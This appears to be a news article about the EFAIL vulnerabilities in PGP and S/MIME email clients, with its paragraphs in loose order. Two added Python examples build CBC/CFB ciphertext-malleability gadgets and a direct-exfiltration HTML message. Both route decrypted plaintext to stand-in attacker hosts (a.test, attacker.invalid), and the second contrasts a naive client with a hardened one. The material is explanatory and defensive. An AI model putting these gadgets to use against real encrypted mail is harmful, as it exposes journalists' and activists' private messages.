The team had planned to publish its full findings on Tuesday but rushed them out after news of the flaws spread among the community of encrypted-email users, which includes activists, whistleblowers and journalists working in hostile environments.
German researchers have warned users of a popular form of email encryption that serious flaws mean their messages could be decrypted by attackers. Thunderbird, Apple Mail and Outlook are among the major email clients whose users need to be wary of the attacks, because those clients support PGP or S/MIME encryption and render the decrypted result.
The researchers note that S/MIME uses Cipher Block Chaining (CBC) mode, while OpenPGP uses Cipher Feedback (CFB) mode. Neither mode provides integrity on its own (OpenPGP's modification detection code is optional and was not enforced by many clients), so an attacker who knows a single plaintext block, typically a predictable MIME header, can rewrite the ciphertext so that it decrypts to attacker-chosen blocks interleaved with garbage blocks. Both modes are therefore exploitable in similar ways.
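The malleability the researchers point to, as an added example that is not the researchers' or any mail client's code. It implements CBC and CFB over a SHA-256 Feistel permutation (an assumed stand-in for AES, chosen so the block runs with the standard library only; the gadgets depend on the mode, not on the block cipher), then appends attacker-chosen 16-byte blocks to a constructed ciphertext using nothing but the IV, the first ciphertext block and a guess of the first plaintext block. The key, message and chosen blocks are constructed for the demonstration.

```python
"""Added example: CBC (S/MIME) and CFB (OpenPGP) malleability gadgets.
A 4-round SHA-256 Feistel network stands in for AES (assumption, not AES)."""
import hashlib

BLOCK = 16          # block size in bytes, as for AES
HALF = BLOCK // 2


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:HALF]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Invertible keyed permutation of one block (Feistel, 4 rounds)."""
    l, r = block[:HALF], block[HALF:]
    for rnd in range(4):
        l, r = r, xor(l, _round(key, rnd, r))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:HALF], block[HALF:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _round(key, rnd, l)), l
    return l + r


def split(data: bytes) -> list:
    assert len(data) % BLOCK == 0
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def cbc_encrypt(key, iv, pt):            # S/MIME:  C_i = E(P_i ^ C_{i-1})
    out, prev = [], iv
    for p in split(pt):
        prev = block_encrypt(key, xor(p, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ct):            #          P_i = D(C_i) ^ C_{i-1}
    out, prev = [], iv
    for c in split(ct):
        out.append(xor(block_decrypt(key, c), prev))
        prev = c
    return b"".join(out)


def cfb_encrypt(key, iv, pt):            # OpenPGP: C_i = E(C_{i-1}) ^ P_i
    out, prev = [], iv
    for p in split(pt):
        prev = xor(block_encrypt(key, prev), p)
        out.append(prev)
    return b"".join(out)


def cfb_decrypt(key, iv, ct):            #          P_i = E(C_{i-1}) ^ C_i
    out, prev = [], iv
    for c in split(ct):
        out.append(xor(block_encrypt(key, prev), c))
        prev = c
    return b"".join(out)


# Each gadget is a two-block ciphertext chunk that decrypts to
# (garbage, chosen) wherever it is spliced in. Inputs: IV, C_1 and the
# attacker's knowledge of P_1. The key is never needed.
def cbc_gadget(iv, c1, p1, chosen):
    x = xor(xor(iv, p1), chosen)         # D(C_1) ^ X = (P_1 ^ IV) ^ X = chosen
    return x + c1


def cfb_gadget(iv, c1, p1, chosen):
    c1x = xor(xor(c1, p1), chosen)       # E(IV) ^ C_1' = (C_1 ^ P_1) ^ C_1' = chosen
    return iv + c1x


MODES = {"cbc": (cbc_encrypt, cbc_decrypt, cbc_gadget),
         "cfb": (cfb_encrypt, cfb_decrypt, cfb_gadget)}


def demo(mode: str) -> tuple:
    """Encrypt a constructed message, append chosen blocks without the key,
    and return (original blocks, decrypted forged blocks, chosen blocks)."""
    encrypt, decrypt, gadget = MODES[mode]
    key = hashlib.sha256(b"constructed demo key").digest()[:BLOCK]   # constructed
    iv = bytes(range(BLOCK))                                          # constructed
    pt = b"Content-Type: multipart/mixed\r\n\r\nvery secret".ljust(3 * BLOCK)
    ct = encrypt(key, iv, pt)
    p1 = pt[:BLOCK]                 # attacker's guess: a predictable MIME header
    # In the real attack the garbage blocks land inside an attribute value or
    # comment and the chosen blocks form the tag that exfiltrates the plaintext.
    chosen = [b'<img ignore="   ', b'" src="//a.test/']
    assert all(len(c) == BLOCK for c in chosen)
    forged = ct + b"".join(gadget(iv, ct[:BLOCK], p1, c) for c in chosen)
    return split(pt), split(decrypt(key, iv, forged)), chosen
```

In both modes the forged ciphertext decrypts to the three original blocks, then alternating garbage and chosen blocks; an unauthenticated client will hand that to its HTML renderer as if it were the sender's message. An authenticated mode (or a client that refuses to show output when the OpenPGP MDC check fails) is what prevents this.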
A second Tweet warns "There are now no reliable fixes for the vulnerability".
Users should immediately disable or remove any tools that automatically decrypt PGP-encrypted emails until the flaws are understood and fixed, EFF said.
Efail attacks work by abusing the active content of HTML emails, such as externally loaded images or stylesheets, to access or "exfiltrate" plaintext. "There is a real attack that can be exploited by people that allows them to decrypt a lot of encrypted email".
The EFAIL vulnerabilities, for which no software patch is yet available, "might reveal the plaintext of encrypted emails, including encrypted emails sent in the past", according to the researchers. The first attack is a "direct exfiltration" attack that relies on clients such as Apple Mail, iOS Mail and Mozilla Thunderbird rendering the decrypted email as HTML: attacker-controlled HTML placed in the same message before and after the encrypted part turns the decrypted plaintext into part of a URL that the client then fetches from the attacker's server. The second abuses the malleability of the CBC and CFB modes noted above to inject such HTML into the encrypted part itself.
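The direct exfiltration shape described above, as an added example that is not the researchers' or any mail client's code. It builds the three-part message an attacker would send (the middle part stands in for the PGP/MIME or S/MIME part after the victim's client has decrypted it), then models two clients: one that concatenates every HTML part into a single document and loads every image, and one that renders each part on its own and never fetches remote content. The collector URL, addresses and secret text are hypothetical and constructed for the demonstration.

```python
"""Added example (not from the EFAIL paper or any mail client): the
'direct exfiltration' message and two client models. Standard library only;
the attacker URL, addresses and secret are hypothetical."""
import email
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from html.parser import HTMLParser
from urllib.parse import urlsplit

COLLECTOR = "http://attacker.invalid/collect?m="   # hypothetical attacker server
SECRET = "Draft: the source for the story is K. Meet at the usual place."  # constructed


def build_attack_message(decrypted_part: str) -> str:
    """Attacker-built multipart/mixed message in wire format. The middle part
    stands in for the encrypted part *after* the client has decrypted it;
    the outer parts are attacker-chosen HTML fragments."""
    msg = MIMEMultipart("mixed")
    msg["From"] = "mallory@attacker.invalid"
    msg["To"] = "alice@example.invalid"
    msg["Subject"] = "re: your draft"
    msg.attach(MIMEText('<img src="' + COLLECTOR, "html"))   # opens the URL
    msg.attach(MIMEText(decrypted_part, "html"))              # decrypted plaintext
    msg.attach(MIMEText('">', "html"))                        # closes the tag
    return msg.as_string()


class _ImgSources(HTMLParser):
    """Collects the src of every <img>, i.e. what a renderer would fetch."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.srcs.extend(v for k, v in attrs if k == "src" and v)


def img_sources(html: str) -> list:
    parser = _ImgSources()
    parser.feed(html)
    parser.close()
    return parser.srcs


def html_parts(wire: str) -> list:
    msg = email.message_from_string(wire)
    return [p.get_payload(decode=True).decode() for p in msg.walk()
            if p.get_content_type() == "text/html"]


def naive_client(wire: str) -> list:
    """Vulnerable model: all HTML parts become one document and every image
    in it is loaded. Returns the URLs the client would fetch."""
    return img_sources("".join(html_parts(wire)))


def hardened_client(wire: str) -> tuple:
    """Renders each part as its own document and refuses remote (http/https)
    content, so only cid:/data: style sources could ever be fetched.
    Returns (fetched, blocked)."""
    fetched, blocked = [], []
    for part in html_parts(wire):
        for src in img_sources(part):
            remote = urlsplit(src).scheme in ("http", "https")
            (blocked if remote else fetched).append(src)
    return fetched, blocked


if __name__ == "__main__":
    wire = build_attack_message(SECRET)
    print("naive client fetches:   ", naive_client(wire))
    print("hardened client fetches:", hardened_client(wire)[0])
```

The naive model fetches a single URL that begins with the attacker's collector address and carries the whole decrypted text as part of the path; the hardened model fetches nothing, because the attacker's fragments never join into a complete tag and remote loads are refused anyway. Both changes (per-part rendering and blocking remote content) are worth having, since either one alone closes only part of the channel.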
Disabling PGP and S/MIME decryption in the mail client is seen as a conservative stopgap until proper mitigations can be applied more broadly; disabling HTML rendering and the loading of remote content in the client removes the exfiltration channel the attacks depend on.
The EFF also said that users should switch, for the time being, to non-email secure messaging apps such as Signal for sensitive communications.
Security researchers claim to have discovered a set of vulnerabilities (collectively called Efail) that affect users of certain email clients that use PGP (Pretty Good Privacy) or S/MIME (Secure/Multipurpose Internet Mail Extensions), two widely used methods for encrypting email. Under both schemes a message is encrypted to the recipient's public key (in practice, a per-message session key is encrypted with that public key and the body with the session key) and can be decrypted only with the recipient's corresponding private key.